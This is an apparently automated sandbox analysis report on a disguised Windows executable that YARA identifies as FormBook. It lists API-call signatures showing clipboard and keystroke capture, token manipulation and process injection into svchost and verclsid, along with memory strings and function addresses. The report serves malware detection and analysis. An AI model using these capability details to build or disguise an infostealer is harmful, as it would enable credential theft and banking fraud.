                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004CED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004CED6A
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004CEAFF
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_004BAA57
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004E9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004E9576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3548246487.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3548136805.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3551901085.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3547874217.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1829643197.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1835373056.00000000091A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1830333241.0000000005AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000000.1691214055.0000000000512000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d220c422-a
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000000.1691214055.0000000000512000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b0088d1d-f
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_26156bcc-0
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cadccd65-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C613 NtClose,1_2_0042C613
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A903 NtAllocateVirtualMemory,1_2_0040A903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974340 NtSetContextThread,1_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974650 NtSuspendThread,1_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtCreateSection,1_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C60 NtCreateKey,1_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973090 NtSetValueKey,1_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D70 NtOpenThread,1_2_03973D70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D4650 NtSuspendThread,LdrInitializeThunk,3_2_050D4650
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D4340 NtSetContextThread,LdrInitializeThunk,3_2_050D4340
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_050D2D10
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_050D2D30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2DD0 NtDelayExecution,LdrInitializeThunk,3_2_050D2DD0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_050D2DF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2C60 NtCreateKey,LdrInitializeThunk,3_2_050D2C60
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_050D2C70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_050D2CA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2F30 NtCreateSection,LdrInitializeThunk,3_2_050D2F30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2FB0 NtResumeThread,LdrInitializeThunk,3_2_050D2FB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2FE0 NtCreateFile,LdrInitializeThunk,3_2_050D2FE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_050D2E80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_050D2EE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2B60 NtClose,LdrInitializeThunk,3_2_050D2B60
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_050D2BA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_050D2BE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_050D2BF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2AD0 NtReadFile,LdrInitializeThunk,3_2_050D2AD0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2AF0 NtWriteFile,LdrInitializeThunk,3_2_050D2AF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D35C0 NtCreateMutant,LdrInitializeThunk,3_2_050D35C0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D39B0 NtGetContextThread,LdrInitializeThunk,3_2_050D39B0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2D00 NtSetInformationFile,3_2_050D2D00
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2DB0 NtEnumerateKey,3_2_050D2DB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2C00 NtQueryInformationProcess,3_2_050D2C00
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2CC0 NtQueryVirtualMemory,3_2_050D2CC0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2CF0 NtOpenProcess,3_2_050D2CF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2F60 NtCreateProcessEx,3_2_050D2F60
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2F90 NtProtectVirtualMemory,3_2_050D2F90
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2FA0 NtQuerySection,3_2_050D2FA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2E30 NtWriteVirtualMemory,3_2_050D2E30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2EA0 NtAdjustPrivilegesToken,3_2_050D2EA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2B80 NtQueryInformationFile,3_2_050D2B80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2AB0 NtWaitForSingleObject,3_2_050D2AB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3010 NtOpenDirectoryObject,3_2_050D3010
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3090 NtSetValueKey,3_2_050D3090
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3D10 NtOpenProcessToken,3_2_050D3D10
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3D70 NtOpenThread,3_2_050D3D70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030493D0 NtDeleteFile,3_2_030493D0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030492E0 NtReadFile,3_2_030492E0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_03049170 NtCreateFile,3_2_03049170
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030495D0 NtAllocateVirtualMemory,3_2_030495D0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_03049470 NtClose,3_2_03049470
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_004BD5EB
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004B1201
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004BE8F6
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C20460_2_004C2046
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004580600_2_00458060
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B82980_2_004B8298
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0048E4FF0_2_0048E4FF
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0048676B0_2_0048676B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004E48730_2_004E4873
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0045CAF00_2_0045CAF0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0047CAA00_2_0047CAA0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0046CC390_2_0046CC39
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00486DD90_2_00486DD9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0046B1190_2_0046B119
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004591C00_2_004591C0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004713940_2_00471394
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004717060_2_00471706
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0047781B0_2_0047781B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0046997D0_2_0046997D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004579200_2_00457920
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004719B00_2_004719B0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00477A4A0_2_00477A4A
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00471C770_2_00471C77
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00477CA70_2_00477CA7
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004DBE440_2_004DBE44
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00489EEE0_2_00489EEE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0045BF400_2_0045BF40
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00471F320_2_00471F32
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_01573B500_2_01573B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185B31_2_004185B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100931_2_00410093
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E10B1_2_0040E10B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1131_2_0040E113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022501_2_00402250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012101_2_00401210
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023F01_2_004023F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EC231_2_0042EC23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE6A1_2_0040FE6A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026701_2_00402670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE731_2_0040FE73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F201_2_00402F20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167DE1_2_004167DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167E31_2_004167E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A003E61_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F01_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA3521_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C02C01_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E02741_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A001AA1_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F41A21_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81CC1_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA1181_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039301001_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C81581_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D20001_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C01_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039647501_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039407701_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C6E01_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A005911_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039405351_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE4F61_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E44201_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F24461_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6BD71_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB401_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA801_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A9A61_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2F301_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AE0D1_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DCD1F1_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
